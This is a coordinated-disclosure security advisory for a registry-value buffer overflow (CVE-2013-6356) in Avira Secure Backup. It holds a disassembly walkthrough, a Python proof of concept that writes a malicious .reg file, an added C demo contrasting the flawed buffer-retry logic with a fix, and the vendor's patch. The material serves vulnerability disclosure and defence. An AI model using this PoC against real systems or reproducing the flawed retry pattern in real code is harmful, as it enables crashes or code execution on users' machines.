Avira Secure Backup 1.0.0.1 Build 3616 – ‘.reg’ Buffer Overflow

  • Author: Julien Ahrens
    Date: 2013-11-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/29671/
  • RCE Security Advisory
    http://www.rcesecurity.com
     
     
    1. ADVISORY INFORMATION
    -----------------------
    Product: Avira Secure Backup
    Vendor URL: www.avira.com
    Type: Improper Restriction of Operations within the Bounds of
    a Memory Buffer [CWE-119]
    Date found: 2013-10-30
    Date published: 2013-11-16
    CVSSv2 Score: 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
    CVE: CVE-2013-6356
     
     
    2. CREDITS
    ----------
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.
     
     
    3. VERSIONS AFFECTED
    --------------------
    Avira Secure Backup v1.0.0.1 Build 3616
     
     
    4. VULNERABILITY DESCRIPTION
    ----------------------------
    A buffer overflow vulnerability has been identified in Avira Secure
    Backup v1.0.0.1 Build 3616.

    On startup the application loads the values of the Registry keys
    "AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from
    "HKEY_CURRENT_USER\Software\Avira Secure Backup" but does not properly
    validate the length of the fetched values before using them in the
    further application context, which leads to a buffer overflow
    condition with possible persistent code execution.

    The application queries each value via a RegQueryValueExW call with a
    fixed buffer pointer (lpData) and a fixed buffer size (lpcbData, preset
    to 0x820 bytes). If the stored value is larger than that predefined
    size, RegQueryValueExW returns ERROR_MORE_DATA and writes the required
    size back through lpcbData. The application then issues a second
    RegQueryValueExW call with this new buffer size, i.e. the full length
    of the input string, but reuses the original buffer pointer (lpData),
    which has not been resized. The second call therefore copies the whole
    value past the end of the buffer and overwrites adjacent stack memory,
    including SEH records.

    An attacker needs to force the victim to import an arbitrary .reg file
    in order to exploit the vulnerability; since the key lives under
    HKEY_CURRENT_USER, no elevated privileges are required to write it.
    Successful exploits can allow attackers to execute arbitrary code with
    the privileges of the user running the application. Failed exploits
    will result in a denial-of-service condition. The attack scenario is
    persistent, because the code is executed on every application start as
    long as the manipulated values remain in the Registry.
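    As an added example, not code from this advisory, from Avira or from
    Win32, the following C program models the retry logic of the function
    at 0043F0D2 (listed in section 5) against a mock of RegQueryValueExW's
    documented size contract, so it builds and runs on any platform:
    read_like_avira reproduces the vulnerable pattern (same buffer, grown
    size), read_safely shows the fix (grow the buffer to the size reported
    with ERROR_MORE_DATA before retrying), and the demo_ helpers feed both
    a constructed value of U+00CC characters, which is what the PoC's 0xCC
    bytes become once regedit imports the ANSI .reg file. The mock_/demo_
    names, the guard-region check and the sample value are this example's
    own assumptions.

```c
/* Added example, not Avira's or Win32's code: the CVE-2013-6356 retry pattern and
 * its fix, run against a mock_ of RegQueryValueExW's documented size contract so
 * it builds without Windows. mock_/demo_ names and the sample value are assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define ERROR_SUCCESS        0L
#define ERROR_FILE_NOT_FOUND 2L
#define ERROR_MORE_DATA      234L   /* Win32 error codes */
#define APP_BUF_SIZE         0x820  /* cbData the binary presets at 0043F0F6 */
#define GUARD_SIZE           0x2000 /* stands in for the stack data (SEH records) behind the buffer */

/* One REG_SZ value: UTF-16LE bytes including the terminating wide null. */
typedef struct { const char *name; const unsigned char *data; uint32_t cb; } mock_value_t;

/* Documented contract: buffer too small -> required size written back through
 * lpcbData, ERROR_MORE_DATA returned, nothing copied. Otherwise copy and update. */
static long mock_RegQueryValueEx(const mock_value_t *key, size_t nvals, const char *name,
                                 unsigned char *lpData, uint32_t *lpcbData)
{
    for (size_t i = 0; i < nvals; i++) {
        if (strcmp(key[i].name, name) != 0) continue;
        if (*lpcbData < key[i].cb) { *lpcbData = key[i].cb; return ERROR_MORE_DATA; }
        for (uint32_t b = 0; b < key[i].cb; b++) lpData[b] = key[i].data[b];
        *lpcbData = key[i].cb;
        return ERROR_SUCCESS;
    }
    return ERROR_FILE_NOT_FOUND;
}

/* Vulnerable pattern from 0043F0D2: fixed buffer, cb preset to 0x820, and the retry
 * (in the binary: against the KEY_WOW64_64KEY view) reuses the same buffer with the
 * larger size the first call wrote into cb. */
static bool read_like_avira(const mock_value_t *key, size_t nvals, const char *name,
                            unsigned char *fixed_buf)
{
    uint32_t cb = APP_BUF_SIZE;
    if (mock_RegQueryValueEx(key, nvals, name, fixed_buf, &cb) == ERROR_SUCCESS) return true;
    return mock_RegQueryValueEx(key, nvals, name, fixed_buf, &cb) == ERROR_SUCCESS;
}

/* Hardened form: on ERROR_MORE_DATA grow the buffer to the reported size before
 * retrying. Returns a malloc'd copy (caller frees) with its byte count in *out_cb. */
static unsigned char *read_safely(const mock_value_t *key, size_t nvals, const char *name,
                                  uint32_t *out_cb)
{
    uint32_t cb = APP_BUF_SIZE;
    unsigned char *buf = malloc(cb);
    if (!buf) return NULL;
    long rc = mock_RegQueryValueEx(key, nvals, name, buf, &cb);
    if (rc == ERROR_MORE_DATA) {
        unsigned char *grown = realloc(buf, cb);
        if (!grown) { free(buf); return NULL; }
        buf = grown;
        rc = mock_RegQueryValueEx(key, nvals, name, buf, &cb);
    }
    if (rc != ERROR_SUCCESS) { free(buf); return NULL; }
    *out_cb = cb;
    return buf;
}

/* Constructed input: nchars copies of U+00CC (what the PoC's raw 0xCC bytes become
 * once regedit imports the ANSI .reg file) plus the wide null; nchars capped at 4000. */
static unsigned char demo_data[2 * 4000 + 2];
static mock_value_t demo_value(size_t nchars)
{
    if (nchars > 4000) nchars = 4000;
    for (size_t i = 0; i < nchars; i++) { demo_data[2 * i] = 0xCC; demo_data[2 * i + 1] = 0x00; }
    demo_data[2 * nchars] = demo_data[2 * nchars + 1] = 0x00;
    mock_value_t v = { "AutoUpdateProgressFilename", demo_data, (uint32_t)(2 * nchars + 2) };
    return v;
}

/* Runs the vulnerable reader with a 0xAA guard region behind the 0x820-byte buffer
 * and returns how many guard bytes were overwritten (0 means the value fitted). */
static size_t demo_bytes_clobbered(size_t nchars)
{
    static unsigned char frame[APP_BUF_SIZE + GUARD_SIZE];
    mock_value_t key = demo_value(nchars);
    memset(frame, 0xAA, sizeof frame);
    read_like_avira(&key, 1, key.name, frame);
    size_t hit = 0;
    for (size_t i = APP_BUF_SIZE; i < sizeof frame; i++) hit += (frame[i] != 0xAA);
    return hit;
}

/* Same value through the hardened reader; returns the byte count it handed back. */
static uint32_t demo_safe_read_size(size_t nchars)
{
    mock_value_t key = demo_value(nchars);
    uint32_t cb = 0;
    unsigned char *v = read_safely(&key, 1, key.name, &cb);
    if (!v) return 0;
    free(v);
    return cb;
}
```

    With the PoC's 1240 characters the stored value is 2482 bytes, so the
    vulnerable reader writes 402 bytes past the 0x820-byte buffer, while
    the hardened reader hands back all 2482 bytes in a correctly sized
    allocation; 1039 characters (2080 bytes with the terminator) is the
    largest value that still fits. In the real binary the same fix can be
    had by calling RegQueryValueExW once with lpData = NULL to obtain the
    size, or by capping lpcbData at the buffer size before any retry.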
     
     
    5. DEBUG INFORMATION
    --------------------
    Call stack of main thread
    Address   Returns to  Procedure / arguments         Called from
    0012EB48  77DA6F87    <JMP.&ntdll.memmove>          ADVAPI32.77DA6F82
    0012EB4C  0012ECBC    dest = 0012ECBC
    0012EB50  0015760C    src = 0015760C
    0012EB54  00002712    n = 2712 (10002.)
    0012EC28  77DA708B    ADVAPI32.77DA6E02             ADVAPI32.77DA7086
    0012EC60  0043F15D    Includes ADVAPI32.77DA708B    Avira_Se.0043F15B
    0012EC9C  0043F3F8    Avira_Se.0043F0D2             Avira_Se.0043F3F3
    0012F5B4  00CC00CC    *** CORRUPT ENTRY ***

    The return address 0043F15D shows that the memmove was reached from the
    second RegQueryValueExW call (CALL EDI at 0043F15B in the listing
    below), and the corrupt entry 00CC00CC is the wide-character form of the
    0xCC filler written by the PoC.
     
    The vulnerable code part of Avira Secure Backup.exe:
    0043F0D2  PUSH EBP
    0043F0D3  MOV EBP,ESP
    0043F0D5  SUB ESP,10
    0043F0D8  PUSH EBX
    0043F0D9  PUSH ESI
    0043F0DA  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpenKeyExW>]   ; ADVAPI32.RegOpenKeyExW
    0043F0E0  PUSH EDI
    0043F0E1  LEA EAX,DWORD PTR SS:[EBP-8]
    0043F0E4  PUSH EAX                                   ; /pHandle
    0043F0E5  PUSH 20019                                 ; |Access = KEY_READ
    0043F0EA  XOR EBX,EBX                                ; |
    0043F0EC  PUSH EBX                                   ; |Reserved => 0
    0043F0ED  PUSH DWORD PTR SS:[EBP+C]                  ; |Subkey
    0043F0F0  MOV BYTE PTR SS:[EBP-1],BL                 ; |
    0043F0F3  PUSH DWORD PTR SS:[EBP+8]                  ; |hKey
    0043F0F6  MOV DWORD PTR SS:[EBP-C],820               ; |cbData = 0x820 (2080 bytes)
    0043F0FD  CALL ESI                                   ; \RegOpenKeyExW
    0043F0FF  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQueryValueExW>] ; ADVAPI32.RegQueryValueExW
    0043F105  TEST EAX,EAX
    0043F107  JNZ SHORT Avira_Se.0043F133
    0043F109  LEA EAX,DWORD PTR SS:[EBP-C]
    0043F10C  PUSH EAX                                   ; /pBufSize
    0043F10D  PUSH DWORD PTR SS:[EBP+14]                 ; |Buffer
    0043F110  LEA EAX,DWORD PTR SS:[EBP-10]              ; |
    0043F113  PUSH EAX                                   ; |pValueType
    0043F114  PUSH EBX                                   ; |Reserved => NULL
    0043F115  PUSH DWORD PTR SS:[EBP+10]                 ; |ValueName
    0043F118  PUSH DWORD PTR SS:[EBP-8]                  ; |hKey
    0043F11B  CALL EDI                                   ; \RegQueryValueExW (1st call; on ERROR_MORE_DATA [EBP-C] now holds the full value size)
    0043F11D  TEST EAX,EAX
    0043F11F  JNZ SHORT Avira_Se.0043F125
    0043F121  MOV BYTE PTR SS:[EBP-1],1
    0043F125  PUSH DWORD PTR SS:[EBP-8]                  ; /hKey
    0043F128  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
    0043F12E  CMP BYTE PTR SS:[EBP-1],BL
    0043F131  JNZ SHORT Avira_Se.0043F16E
    0043F133  LEA EAX,DWORD PTR SS:[EBP-8]
    0043F136  PUSH EAX                                   ; /pHandle
    0043F137  PUSH 20119                                 ; |Access = KEY_READ|KEY_WOW64_64KEY
    0043F13C  PUSH EBX                                   ; |Reserved => 0
    0043F13D  PUSH DWORD PTR SS:[EBP+C]                  ; |Subkey
    0043F140  PUSH DWORD PTR SS:[EBP+8]                  ; |hKey
    0043F143  CALL ESI                                   ; \RegOpenKeyExW
    0043F145  TEST EAX,EAX
    0043F147  JNZ SHORT Avira_Se.0043F16E
    0043F149  LEA EAX,DWORD PTR SS:[EBP-C]
    0043F14C  PUSH EAX                                   ; /pBufSize (still [EBP-C], now the larger size)
    0043F14D  PUSH DWORD PTR SS:[EBP+14]                 ; |Buffer (same buffer as the 1st call, not resized)
    0043F150  LEA EAX,DWORD PTR SS:[EBP-10]              ; |
    0043F153  PUSH EAX                                   ; |pValueType
    0043F154  PUSH EBX                                   ; |Reserved => NULL
    0043F155  PUSH DWORD PTR SS:[EBP+10]                 ; |ValueName
    0043F158  PUSH DWORD PTR SS:[EBP-8]                  ; |hKey
    0043F15B  CALL EDI                                   ; \RegQueryValueExW (2nd call; overflows the buffer, see call stack above)
    0043F15D  TEST EAX,EAX
    0043F15F  JNZ SHORT Avira_Se.0043F165
    0043F161  MOV BYTE PTR SS:[EBP-1],1
    0043F165  PUSH DWORD PTR SS:[EBP-8]                  ; /hKey
    0043F168  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
    0043F16E  XOR EAX,EAX
    0043F170  CMP BYTE PTR SS:[EBP-1],BL
    0043F173  POP EDI
    0043F174  POP ESI
    0043F175  SETNE AL
    0043F178  POP EBX
    0043F179  LEAVE
    0043F17A  RETN
     
     
    6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
    ------------------------------------
    Use the following code to exploit the vulnerability:
     
    #!/usr/bin/env python3
    # CVE-2013-6356 PoC: writes a .reg file whose oversized REG_SZ value
    # overflows the fixed 0x820-byte buffer Avira Secure Backup uses when it
    # reads "AutoUpdateProgressFilename" at startup.
    import sys

    outfile = "poc.reg"

    # 1240 bytes of 0xCC; regedit imports a BOM-less .reg file as ANSI, so
    # the value is stored as 1240 wide characters (2 bytes each) and exceeds
    # the 0x820-byte buffer.
    junk1 = b"\xCC" * 1240

    poc = b"Windows Registry Editor Version 5.00\n\n"
    poc += b"[HKEY_CURRENT_USER\\Software\\Avira Secure Backup]\n"
    poc += b"\"AutoUpdateProgressFilename\"=\"" + junk1 + b"\""

    try:
        print("[*] Creating exploit file...\n")
        # binary mode keeps the raw 0xCC bytes, as the original Python 2 script wrote them
        with open(outfile, "wb") as writeFile:
            writeFile.write(poc)
        print("[*] File successfully created!")
    except OSError as e:
        print("[!] Error while creating file: %s" % e)
        sys.exit(1)
     
     
    7. SOLUTION
    -----------
    Update to v1.0.0.2 Build 3630 or later
     
     
    8. REPORT TIMELINE
    ------------------
    2013-10-30: Discovery of the vulnerability
    2013-11-03: RCE Security sends first notification to vendor via mail
    with disclosure date set to 18 November 2013
    2013-11-03: MITRE assigns CVE-2013-6356 for this issue
    2013-11-04: Vendor ACKs the vulnerability
    2013-11-10: RCE Security asks for a status
    2013-11-11: Vendor expects to receive a fix the same day
    2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
    2013-11-16: Coordinated Disclosure
     
     
    9. REFERENCES
    -------------
    http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/